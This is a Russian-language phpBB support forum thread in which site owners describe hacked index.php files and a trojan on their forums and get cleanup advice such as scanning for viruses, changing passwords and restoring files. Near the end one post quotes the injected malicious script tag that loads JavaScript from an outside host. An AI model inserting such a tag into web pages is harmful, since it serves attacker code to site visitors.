Как убить Трояна?
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
).
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение

-
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 7 месяцев
- Благодарил (а): 1 раз
Как убить Трояна?
обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
-
- phpBB 1.0.0
- Сообщения: 3
- Стаж: 15 лет 5 месяцев
Re: Появилась -0 страница.
Спасибо большое, всё заработало. А всвязи с чем такое могло произойти чтобы впредь знать как предотвратить такое.
-
- Former team member
- Сообщения: 3739
- Стаж: 19 лет 10 месяцев
- Поблагодарили: 3 раза
Re: Появилась -0 страница.
видимо некорректное количество сообщений записалось в таблицу с форумами. Нажатие кнопки "синхро..." пересчитало все заново.
-
- phpBB 1.0.0
- Сообщения: 7
- Стаж: 15 лет 1 месяц
Re: Как убить Трояна?
Подцепил js.redirector.based.2 по версии dr web cureit, первый раз занес с локальной машины.
Почистился вручную, часть из пакета инсталляции, часть вручную. Убрал учетные записи в фтп-менеджере.
Через неделю новое заражение, не совсем понимаю откуда. Подозрение на хвосты с предыдущей чистки.
Пароли не храню (после первого заражения)
От провайдера поддержки нет
Кто чистился, посоветуйте на что обращать внимание?
Какое поведение у вируса, кроме движения по файлам index.* и *.js
Локально машина чистая, проверился сегодняшним CureIt!
Версия phpBB 3.0.7-PL1 спасибо.
Почистился вручную, часть из пакета инсталляции, часть вручную. Убрал учетные записи в фтп-менеджере.
Через неделю новое заражение, не совсем понимаю откуда. Подозрение на хвосты с предыдущей чистки.
Пароли не храню (после первого заражения)
От провайдера поддержки нет
Кто чистился, посоветуйте на что обращать внимание?
Какое поведение у вируса, кроме движения по файлам index.* и *.js
Локально машина чистая, проверился сегодняшним CureIt!
Версия phpBB 3.0.7-PL1 спасибо.
-
- phpBB 1.4.0
- Сообщения: 36
- Стаж: 18 лет 2 месяца
- Откуда: Питер
Re: Как убить Трояна?
Мою CPG задушили напрочь - это уже происходит совсем не так, как раньше. Прописываются или изменяют практически все файлы галереи.
Всё течёт, всё изменяется.
-
- phpBB 1.0.0
- Сообщения: 9
- Стаж: 17 лет
Взлом phpbb 3.0.5
Опишу что у меня
может предложите варианты.
форум phpbb 3.0.5
знаю, скажете давно не обновлял - автообновление превышает нагрузку на сервак хостера и никак не получается сделать последнее обновление (теперь уже два последних)
сегодня вечером, обнаруживаю что форум выдает ошибки, антивирус (Avast) вопит что что-то хочет на мой комп вот отсюда
http_://flying-city-2010.com//viewtopic.php\{gzip} [L] JS:Pdfka-AEP [Expl] (0)
начинаю копать через ФТП
обнаруживаю
1. все index.php во всех папках изменены текущим числом
2. везде в них присутствует /includes/hooks/index.php
3. нахожу эту папку, там какой-то файл index.php с заныканным внутри него java-script - явно зашифрованным - потому что понять что там не удалось
4. становится стремно, переименовываю папку чтобы не ссылалось, заменяю index.php на старый из комлпекта phpbb3
теперь собственно вопрос
каким образом за 4 минуты (с 13:06 до 13:10), были испорчены ВСЕ файлы на хостинге моем которые были с именем index.php
каким образом можно записать на хостинг новую папку с новым файлом, если я не заходил своим паролем на хостинг-админку уже пару месяцев (знали бы - раньше сломали бы).
другие CMS на хостинге сделаны на php-fusion - знаю система дырявая, но простая, сайты между собой не связаны ни контентом ничем больше (кроме того что хостятся на одном сервере).
Я не спрашиваю что делать
- понятно что очистить все мне просто не удастся, все надо удалять
Я прошу просто помочь сделать копию БД
воможно ли подцепить версию phphbb установленную - к уже имеющейся БД?
возможны ли проблемы в самой БД?
спасибо
может предложите варианты.
форум phpbb 3.0.5
знаю, скажете давно не обновлял - автообновление превышает нагрузку на сервак хостера и никак не получается сделать последнее обновление (теперь уже два последних)
сегодня вечером, обнаруживаю что форум выдает ошибки, антивирус (Avast) вопит что что-то хочет на мой комп вот отсюда
http_://flying-city-2010.com//viewtopic.php\{gzip} [L] JS:Pdfka-AEP [Expl] (0)
начинаю копать через ФТП
обнаруживаю
1. все index.php во всех папках изменены текущим числом
2. везде в них присутствует /includes/hooks/index.php
3. нахожу эту папку, там какой-то файл index.php с заныканным внутри него java-script - явно зашифрованным - потому что понять что там не удалось

4. становится стремно, переименовываю папку чтобы не ссылалось, заменяю index.php на старый из комлпекта phpbb3
теперь собственно вопрос
каким образом за 4 минуты (с 13:06 до 13:10), были испорчены ВСЕ файлы на хостинге моем которые были с именем index.php
каким образом можно записать на хостинг новую папку с новым файлом, если я не заходил своим паролем на хостинг-админку уже пару месяцев (знали бы - раньше сломали бы).
другие CMS на хостинге сделаны на php-fusion - знаю система дырявая, но простая, сайты между собой не связаны ни контентом ничем больше (кроме того что хостятся на одном сервере).
Я не спрашиваю что делать

Я прошу просто помочь сделать копию БД
воможно ли подцепить версию phphbb установленную - к уже имеющейся БД?
возможны ли проблемы в самой БД?
спасибо
-
- Бывший член :)
- Сообщения: 2925
- Стаж: 19 лет 11 месяцев
- Благодарил (а): 19 раз
- Поблагодарили: 30 раз
- Забанен: Бессрочно
Re: Взлом phpbb 3.0.5
У Вас на компе вирус.
Действия обычные:
- проверяемся на вирусы
- меняем ВСЕ пароли
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
Действия обычные:
- проверяемся на вирусы
- меняем ВСЕ пароли
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
-
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз
Re: Взлом phpbb 3.0.5
Этого достаточноUmaCat писал(а):сайты между собой не связаны ни контентом ничем больше (кроме того что хостятся на одном сервере)

ДаUmaCat писал(а):воможно ли подцепить версию phphbb установленную - к уже имеющейся БД?
ДаUmaCat писал(а):возможны ли проблемы в самой БД?
-
- phpBB 1.0.0
- Сообщения: 9
- Стаж: 17 лет
Re: Взлом phpbb 3.0.5
заменил все что было изменено вредными вирусописателями 
но такое впечатление что форум закешировал страницы, как не входя в админку очистить кеш?
папка cache почищена ( там только свежий index.php и htaccess)
где еще проверить?
просто файлы заменены уже, а все равно браузер показывает что идет обращение к несуществующему файлу
[phpBB Debug] PHP Notice: in file /common.php on line 219: main(./includes/hooks/index.php) [function.main]: failed to open stream: No such file or directory
плин походу у меня в базе хрень эта прописывает
сори, пошел чиститься дальше

но такое впечатление что форум закешировал страницы, как не входя в админку очистить кеш?
папка cache почищена ( там только свежий index.php и htaccess)
где еще проверить?
просто файлы заменены уже, а все равно браузер показывает что идет обращение к несуществующему файлу
[phpBB Debug] PHP Notice: in file /common.php on line 219: main(./includes/hooks/index.php) [function.main]: failed to open stream: No such file or directory
плин походу у меня в базе хрень эта прописывает
сори, пошел чиститься дальше
-
- Former team member
- Сообщения: 3739
- Стаж: 19 лет 10 месяцев
- Поблагодарили: 3 раза
Re: Взлом phpbb 3.0.5
Очисть таблицу phpbb_styles_template_dataUmaCat писал(а):где еще проверить?
Проверь наличие файла. Лучше замени чистым и дистрибутива.UmaCat писал(а):includes/hooks/index.php
-
- phpBB 1.0.0
- Сообщения: 9
- Стаж: 17 лет
Re: Взлом phpbb 3.0.5
Всем, спасибо
восстановился.
CureIt нашел кейлоггера на компе.
возможно из-за него
но все равно не понятно, почему умный чел-хакер повредил ВСЕ файлы index.php которые имели хоть какое-то отношение к CMS/форумам (разные - php-fusion / e107/ phpbb3 ) а также все файлы с именем main.php, но при этом совершенно не тронул файлы index.php которые отвечали только за редирект.
странно мне это, это же если за 4 минуты все было сделано явно делалось скриптом, логики не могу найти, неужели в скрипт запихали инфу о большинстве CMS/форумах?
Еще раз спасибо
восстановился.
CureIt нашел кейлоггера на компе.
возможно из-за него
но все равно не понятно, почему умный чел-хакер повредил ВСЕ файлы index.php которые имели хоть какое-то отношение к CMS/форумам (разные - php-fusion / e107/ phpbb3 ) а также все файлы с именем main.php, но при этом совершенно не тронул файлы index.php которые отвечали только за редирект.
странно мне это, это же если за 4 минуты все было сделано явно делалось скриптом, логики не могу найти, неужели в скрипт запихали инфу о большинстве CMS/форумах?
Еще раз спасибо
-
- phpBB 1.4.0
- Сообщения: 30
- Стаж: 16 лет 2 месяца
- Откуда: мск
-
- Поддержка
- Сообщения: 3336
- Стаж: 16 лет 1 месяц
- Благодарил (а): 17 раз
- Поблагодарили: 561 раз
Re: Взлом phpbb 3.0.5
И в браузерах не стоит. И на бумажках тоже. Надо тренировать память. Санитар, уведите пациента.
-
- Former team member
- Сообщения: 6517
- Стаж: 20 лет 9 месяцев
- Откуда: Бердск
Re: Как убить Трояна?
только пароль написаный фломастером на экране монитора спасет отца русской демократии 

Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
-
- phpBB 1.4.4
- Сообщения: 106
- Стаж: 18 лет 3 месяца
- Откуда: Курск
Re: Как убить Трояна?
Форумом давно не занимаюсь, стоит 3.0.4
вот такой код дописан в индексовых файлах, рад всех разочаровать, я пользуюсь линуксом
видимо уязвимость все же в скрипте форума
вот такой код дописан в индексовых файлах, рад всех разочаровать, я пользуюсь линуксом

видимо уязвимость все же в скрипте форума
Код: Выделить всё
<script type="text/javascript" src="http://obscurewax.ru/URL.js"></script>
<!--cfae47f881e849f7bf3261c16b6b917c-->
-
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз